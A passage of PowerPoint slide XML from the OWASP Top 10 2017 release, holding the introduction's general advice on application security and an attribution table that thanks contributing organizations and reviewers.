                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>OWASP Code Review Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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smtClean="0"/>
                        <a:t>Constant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. This Top 10 will continue </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>change.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>without changing a single line of your application’s code, you</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> may become vulnerable as new flaws are discovered and attack methods are refined</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Please review the advice at the end of the Top 10 in “W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" dirty="0" smtClean="0"/>
                        <a:t>hat’s Next For Developers, Verifiers, and Organizations” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>for more information.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000" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Think positive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. When you’re ready to stop chasing vulnerabilities and focus on establishing strong application security controls, O</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>WASP is maintaining and promoting the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t> as a guide to organizations and application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> reviewers on what to verify.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="5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smtClean="0"/>
                        <a:t>Use tools wisely</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> vulnerabilities can be quite complex and buried in mountains of code. In many cases, the most cost-effective approach for finding and eliminating these weaknesses is human experts armed with good tools.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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smtClean="0"/>
                        <a:t>Push left, right, and everywhere</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>. Focus</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> on making security an integral part of your culture throughout your development organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. Find out more in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Rugged Handbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFil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916813042"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3657600"/>
          <a:ext cx="3429000" cy="5486400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="343829">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Attribution</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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tr>
              <a:tr h="51425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700" kern="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dirty="0" smtClean="0"/>
                        <a:t>Thanks to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
                        <a:t> for initiating, leading, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>updating the OWASP Top 10 since its inception in 2003, and to its primary authors: Jeff Williams and Dave Wichers.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kern="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kern="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kern="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kern="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We’d like to thank the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> many </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>organizations that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>contributed their vulnerability prevalence data to support the 2017 update, including these large data set providers:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:endParaRPr lang="en-US" sz="600" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>AsTech Consulting</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Branding Brand</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Contrast Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>EdgeScan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>iBLISS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>Minded Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>Paladion Networks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Vantage Point</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="600" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1"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sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId22" invalidUrl="https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP Top 10 - 2017 Data Call-Public Release.xlsx?raw=true"/>
                        </a:rPr>
                        <a:t>is publicly available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>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sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>We would like to thank in advance those who contribute significant constructive comments and  time reviewing this update to the Top 10 and to:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="600" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Neil </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Smithline</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (of Autodesk) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Torsten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>For producing the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>wiki version</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> of this Top 10 release</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475"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00" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Jason Li </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>–</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> For providing extensive comments prior to issuing the Release Candidate.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="600" kern="1200" baseline="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sz="1000" u="none" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>And finally, we’d like to thank in advance all the translators out there that will translate this release of the Top 10 into numerous different languages, helping to make the OWASP Top 10 more accessible to the entire planet.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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>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dirty="0" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3">
            <a:hlinkClick r:id="rId11"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId24" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId25">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="-20000" contrast="-40000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="4688670"/>
            <a:ext cx="1752600" cy="416730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="Table 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366162684"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3665071" y="5753547"/>
          <a:ext cx="2743200" cy="1005840"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1371600"/>
                <a:gridCol w="1371600"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="171450" marR="0" lvl="1" indent="-171450" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t> Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0"/>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914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
